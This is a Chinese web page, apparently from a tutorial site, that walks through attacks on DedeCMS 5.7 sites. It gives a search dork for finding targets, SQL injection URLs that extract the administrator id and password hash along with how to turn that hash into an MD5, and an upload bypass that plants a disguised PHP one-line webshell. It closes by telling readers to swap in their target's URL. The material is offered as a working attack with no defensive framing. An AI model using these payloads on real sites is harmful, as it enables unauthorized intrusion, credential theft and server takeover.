• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • MsSql
  • Mysql
  • oracle
  • MariaDB
  • DB2
  • SQLite
  • PostgreSQL
  • MongoDB
  • Redis
  • Access
  • 数据库其它
  • sybase
  • HBase
您的位置:首页 > 数据库 >Mysql > dedecms5.7最新注入和上传漏洞

dedecms5.7最新注入和上传漏洞

作者:匿名 字体:[增加 减小] 来源:互联网 时间:2018-12-05

匿名通过本文主要向大家介绍了dedecms5.7,最新,注入,上传,漏洞,漏洞,描述,百等相关知识,希望本文的分享对您有所帮助

漏洞描述:百度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">
file:

newname:
< button class="button2" type="submit">提交

把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。

分享到:QQ空间新浪微博腾讯微博微信百度贴吧QQ好友复制网址打印

您可能想查找下面的文章:

  • dedecms5.7最新注入和上传漏洞

相关文章

  • 2018-12-05在win7上安装oracle 10g配置文件更改
  • 2018-12-05Jdbc--具体代码实现
  • 2018-12-05清理MySQL数据库的缓存及修改论坛密码详解
  • 2017-05-11mysql字符集乱码问题解决方法介绍
  • 2018-12-05mysql5.7.14解压版安装的实例方法
  • 2018-12-05Mysql中的Datetime和Timestamp不同之处
  • 2018-12-05MySQL数据库优化技术之配置技巧总结_MySQL
  • 2018-12-05Mysql 报Row size too large 65535 的原因及解决方法_MySQL
  • 2018-12-05mysql Load Data InFile 的用法
  • 2018-12-05mysql存储过程中的异常处理解析_MySQL

文章分类

  • MsSql
  • Mysql
  • oracle
  • MariaDB
  • DB2
  • SQLite
  • PostgreSQL
  • MongoDB
  • Redis
  • Access
  • 数据库其它
  • sybase
  • HBase

最近更新的内容

    • SQLServer分布式事务问题
    • mysql全文搜索 sql命令的写法
    • 解决 phpmyadmin #2002 无法登录 MySQL 服务器
    • 定时备份mysql, 定时切割nginx access log的方法
    • SQL视图 详细介绍
    • MySQL中隐式转换方法
    • MySQL之——MS主从复制(读写分离)实现
    • 基于MySQL的关系型云数据正式上线
    • SQL 正则表达式及mybatis中使用正则表达式
    • sql server:alter database name的问题

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有